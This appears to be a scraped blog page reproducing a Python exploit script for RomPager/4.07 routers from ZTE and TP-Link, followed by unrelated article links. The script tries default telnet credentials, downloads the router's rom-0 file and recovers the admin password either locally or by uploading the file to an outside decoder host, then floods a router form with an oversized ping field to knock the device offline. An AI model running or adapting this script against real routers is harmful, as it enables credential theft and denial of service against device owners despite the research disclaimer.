ZTE and TP-Link RomPager - DoS Exploit
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # Exploit Title: ZTE and TP-Link RomPager DoS Exploit
- # Date: 10-05-2014
- # Server Version: RomPager/4.07 UPnP/1.0
- # Tested Routers: ZTE ZXV10 W300
- # TP-Link TD-W8901G
- # TP-Link TD-W8101G
- # TP-Link TD-8840G
- # Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
- # Tested on: Kali Linux x86
- #
- # Notes: Please note this exploit may contain errors, and
- # is provided "as it is". There is no guarantee
- # that it will work on your target router(s), as
- # the code may have to be adapted.
- # This is to avoid script kiddie abuse as well.
- #
- # Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
- # Author takes no responsibility for any kind of damage you cause.
- #
- # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
- #
- # Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
- # Video: https://www.youtube.com/watch?v=1fSECo2ewoo
- # Dedicate to Nick Knight and Hood3dRob1n
- #
- # ./dos.py -i 192.168.1.1
- import os
- import re
- import sys
- import time
- import urllib
- import base64
- import httplib
- import urllib2
- import requests
- import optparse
- import telnetlib
- import subprocess
- import collections
- import unicodedata
- class BitReader:
- def __init__(self, bytes):
- self._bits = collections.deque()
- for byte in bytes:
- byte = ord(byte)
- for n in xrange(8):
- self._bits.append(bool((byte >> (7-n)) & 1))
- def getBit(self):
- return self._bits.popleft()
- def getBits(self, num):
- res = 0
- for i in xrange(num):
- res += self.getBit() << num-1-i
- return res
- def getByte(self):
- return self.getBits(8)
- def __len__(self):
- return len(self._bits)
- class RingList:
- def __init__(self, length):
- self.__data__ = collections.deque()
- self.__full__ = False
- self.__max__ = length
- def append(self, x):
- if self.__full__:
- self.__data__.popleft()
- self.__data__.append(x)
- if self.size() == self.__max__:
- self.__full__ = True
- def get(self):
- return self.__data__
- def size(self):
- return len(self.__data__)
- def maxsize(self):
- return self.__max__
- def __getitem__(self, n):
- if n >= self.size():
- return None
- return self.__data__[n]
- def filter_non_printable(str):
- return ''.join([c for c in str if ord(c) > 31 or ord(c) == 9])
- def banner():
- return '''
- \t\t _/_/_/ _/_/_/
- \t\t _/ _/ _/_/ _/
- \t\t _/ _/ _/ _/ _/_/
- \t\t _/ _/ _/ _/ _/
- \t\t_/_/_/ _/_/ _/_/_/
- '''
- def dos(host, password):
- while (1):
- url = 'http://' +host+ '/Forms/tools_test_1'
- parameters = {
- 'Test_PVC' : 'PVC0',
- 'PingIPAddr' : '\101'*2000,
- 'pingflag' : '1',
- 'trace_open_flag' : '0',
- 'InfoDisplay' : '+-+Info+-%0D%0A'
- }
- params = urllib.urlencode(parameters)
- req = urllib2.Request(url, params)
- base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
- req.add_header("Authorization", "Basic %s" %base64string)
- req.add_header("Content-type", "application/x-www-form-urlencoded")
- req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
- try:
- print '[~] Sending Payload'
- response = urllib2.urlopen(req, timeout=1)
- sys.exit(0)
- except:
- flag = checkHost(host)
- if flag == 0:
- print '[+] The host is still up and running'
- else:
- print '[~] Success! The host is down'
- sys.exit(0)
- break
- def checkHost(host):
- if sys.platform == 'win32':
- c = "ping -n 2 " + host
- else:
- c = "ping -c 2 " + host
- try:
- x = subprocess.check_call(c, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
- time.sleep(1)
- return x
- except:
- pass
- def checkServer(host):
- connexion = httplib.HTTPConnection(host)
- connexion.request("GET", "/status.html")
- response = connexion.getresponse()
- server = response.getheader("server")
- connexion.close()
- time.sleep(2)
- if server == 'RomPager/4.07 UPnP/1.0':
- return 0
- else:
- return 1
- def checkPassword(host):
- print '[+] Checking for default password'
- defaultpass = 'admin'
- tn = telnetlib.Telnet(host, 23, 4)
- tn.read_until("Password: ")
- tn.write(defaultpass + '\n')
- time.sleep(2)
- banner = tn.read_eager()
- banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
- tn.write("exit\n")
- tn.close()
- time.sleep(4)
- if banner == 'Copyright':
- print '[+] Default password is being used'
- dos(host, defaultpass)
- else:
- print '[!] Default Password is not being used'
- while True:
- msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
- try:
- if msg[0] == 'y':
- password = decodePasswordLocal(host)
- print '[*] Router password is: ' +password
- dos(host, password)
- break
- if msg[0] == 'n':
- password = decodePasswordRemote(host)
- print '[*] Router password is: ' +password
- dos(host, password)
- break
- else:
- print '[!] Enter a valid choice'
- except Exception, e:
- print e
- continue
- def decodePasswordRemote(host):
- fname = 'rom-0'
- if os.path.isfile(fname) == True:
- os.remove(fname)
- urllib.urlretrieve ("http://"+host+"/rom-0", fname)
- # If this URL goes down you might have to find one and change this function.
- # You can also use the local decoder. It might have few errors in getting output.
- url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
- files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload
- data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
- headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include
- res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
- res1 =res.content
- p = re.search('rows=10>(.*)', res1)
- if p:
- passwd = found = p.group(1)
- else:
- password = 'NotFound'
- return passwd
- def decodePasswordLocal(host):
- # Sometimes this might output a wrong password while finding the exact string.
- # print the result as mentioned below and manually find out
- fname = 'rom-0'
- if os.path.isfile(fname) == True:
- os.remove(fname)
- urllib.urlretrieve ("http://"+host+"/rom-0", fname)
- fpos=8568
- fend=8788
- fhandle=file('rom-0')
- fhandle.seek(fpos)
- chunk="*"
- amount=221
- while fpos < fend:
- if fend-fpos < amount:
- amount = amount
- data = fhandle.read(amount)
- fpos += len(data)
- reader = BitReader(data)
- result = ''
- window = RingList(2048)
- while True:
- bit = reader.getBit()
- if not bit:
- char = reader.getByte()
- result += chr(char)
- window.append(char)
- else:
- bit = reader.getBit()
- if bit:
- offset = reader.getBits(7)
- if offset == 0:
- break
- else:
- offset = reader.getBits(11)
- lenField = reader.getBits(2)
- if lenField < 3:
- lenght = lenField + 2
- else:
- lenField <<= 2
- lenField += reader.getBits(2)
- if lenField < 15:
- lenght = (lenField & 0x0f) + 5
- else:
- lenCounter = 0
- lenField = reader.getBits(4)
- while lenField == 15:
- lenField = reader.getBits(4)
- lenCounter += 1
- lenght = 15*lenCounter + 8 + lenField
- for i in xrange(lenght):
- char = window[-offset]
- result += chr(char)
- window.append(char)
- result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
- # In case the password you see is wrong while filtering, manually print it from here and findout.
- #print result
- if 'TP-LINK' in result:
- result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
- result = result.replace("TP-LINK", "")
- result = result[1:]
- if 'ZTE' in result:
- result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
- result = result.replace("ZTE", "")
- result = result[1:]
- if 'tc160' in result:
- result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
- result = result.replace("tc160", "")
- result = result[1:]
- return result
- def regex(path, text):
- match = re.search(path, text)
- if match:
- return match.group()
- else:
- return None
- def main():
- if sys.platform == 'win32':
- os.system('cls')
- else:
- os.system('clear')
- try:
- print banner()
- print '''
- |=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
- [*] Author: Osanda Malith Jayathissa
- [*] Follow @OsandaMalith
- [!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
- [!] Author takes no responsibility for any kind of damage you cause.
- '''
- parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
- parser.add_option('-i', dest='host',
- type='string',
- help='Specify the IP to attack')
- (options, args) = parser.parse_args()
- if options.host is None:
- parser.print_help()
- exit(-1)
- host = options.host
- x = checkHost(host)
- if x == 0:
- print '[+] The host is up and running'
- server = checkServer(host)
- if server == 0:
- checkPassword(host)
- else:
- print ('[!] Sorry the router is not running RomPager')
- else:
- print '[!] The host is not up and running'
- sys.exit(0)
- except KeyboardInterrupt:
- print '[!] Ctrl + C detected\n[!] Exiting'
- sys.exit(0)
- except EOFError:
- print '[!] Ctrl + D detected\n[!] Exiting'
- sys.exit(0)
- if __name__ == "__main__":
- main()
- #EOF
ZTE and TP-Link RomPager - DoS Exploit的更多相关文章
- Metasploit辅助模块
msf > show auxiliary Auxiliary ========= Name Di ...
- Man手册--nmap
目录 nmap使用手册 附录: nmap使用手册 附录: NMAP(1) Nmap Reference Guide NMAP(1) NAME nmap - Network exploration to ...
- CentOS 6.5 安全加固及性能优化 (转)
通过修改CentOS 6.5 的系统默认设置,对系统进行安全加固,进行系统的性能优化. 环境: 系统硬件:vmware vsphere (CPU:2*4核,内存2G) 系统版本:Centos-6.5- ...
- 配置windows路由表,使电脑同时连接内网外网方法
1.环境一(系统:windows xp,内网.外网不是同一类地址,内网地址固定): 外网:通过笔记本的无线网卡连接: 内网:通过笔记本的本地连接: 第一步,连接网线,配置本地连接地址,注意IP地址不要 ...
- IMS Global Learning Tools Interoperability™ Implementation Guide
Final Version 1.1 Date Issued: 13 March 2012 Latest version: http://www.imsglobal ...
- TP-Link 无线路由器设置图文教程----怎么设置TP-Link无线路由器图解
转自:http://www.jb51.net/softjc/39399.html 无线路由器的基础配置 在我们第一次配置无线宽带路由器时,参照说明书找到无线宽带路由器默认的IP地址是192.168.1 ...
- Delphi 使用之函数
函数由一句或多句代码组成,可以实现某个特定的功能.使用函数可以使代码更加易读.易懂,加快编程速度及减少重复代码.过程与函数类似,过程与函数最重要的区别在于,过程没有返回值,而函数能有返回值. ...
- 花生壳+Tomcat
花生壳(内网穿透)新手上路 http://service.oray.com/question/1664.html 好不容易找到一篇关于“花生壳+Tomcat”的好文章,转一下,上次自己弄的时候把自己的 ...
- 无线路由器WDS设置方法图解_无线桥接设置
随着无线网络的发展,现在越来越多的公司及企业都已经开始布局无线局域网,今天我们主要介绍下适合中小企业的无线路由器桥接或WDS功能.文章以TP-link WR841N无线路由器设置为例,其它路由器参考设 ...
随机推荐
- js 练习
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="req_form.aspx.cs ...
- ListView 刷新加载控件
1.MaterialRefreshLayout刷新加载: 导入依赖: compile 'com.cjj.materialrefeshlayout:library:1.3.0' 布局 <com.c ...
- latex给表格添加注释
给表格加注释的确是很多TeX用户不好用的地方,这里提供一个样式和代码,或许对于你的学习使用有所帮助,样式如下: 代码如下: \documentclass[11pt,a4paper,english]{a ...
- Qt5 installation and path configuration
Replace Default Qt version paths in: /usr/lib/x86_64-linux-gnu/qtchooser/default.confor in newer rel ...
- jQuery.eq() 函数
eq() 函数 获取当前对象中指定索引所对应的的元素 语法 $selector.eq(index)//index为指定索引,值为数字型 返回值 返回值为一个对象 实例说明 代码 <!DOCTYP ...
- Oracle 新增删除账户
新增用户: create user test identified by 123456;grant dba,connect,resource to test; 删除账户: drop user xxx ...
- x265,帧内预测代码分析
void Analysis::compressIntraCU(const CUData& parentCTU, const CUGeom& cuGeom, uint32_t& ...
- eclipse遇到不会部署的情况
1.先看下右下角有没有在进行的进程,例如validating 验证中.那就关闭验证的选项 2.看下problem栏有没有问题.会导致building不了.
- C#日常总结
if (!string.IsNullOrEmpty(userid)) { InitPage(); } IsNullOrEmpty 同时测试String是否为nullNothingnullptrnull ...
- 在iframe父界面获取iframe里面的标签
上一篇里边介绍了在里边利用iframe引入另一个html导航文件,有兴趣的朋友可以看一看 http://www.cnblogs.com/simba-lkj/p/6031662.html 目前遇到一些问 ...